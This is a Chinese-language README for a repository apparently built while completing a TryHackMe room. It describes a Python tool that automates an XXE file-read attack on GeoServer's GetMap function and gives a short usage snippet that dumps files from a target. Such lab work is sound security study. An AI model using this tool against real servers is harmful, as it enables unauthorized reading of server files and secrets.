本仓库中的代码和信息仅用于教育和研究目的。仓库所有者对您使用本仓库中的代码和/或信息所做的任何事情不承担任何责任。您的行为由您自己负责。请合法且负责任地使用。
exploit/exploiter.py 文件中的 Python3 类(GeoDumper)自动化利用了 XXE 漏洞,并将泄露的信息保存到本地文件中。
示例:
import exploit.exploiter as exploiter
target_ip = "localhost"
secure = False
geoserver_path = "geoserver"
dumper = exploiter.GeoDumper(target_ip=target_ip, geoserver_path=geoserver_path, is_secure=secure)
(data, filename) = dumper.dump_file(target_file)
print(f"[+] data saved to \"{filename}\"")
print(f"[+] Data:\n{data.decode("utf-8")}")
该漏洞利用 GetMap 函数中未正确清理的 XML 输入,导致攻击者可以任意读取文件。
有关该漏洞的更多信息和更好的解释/分析,可在下面的链接中找到。
注意:我并未发现该漏洞,也没有进行任何相关研究。本代码和仓库是我在 TryHackMe 上完成相关房间时创建的。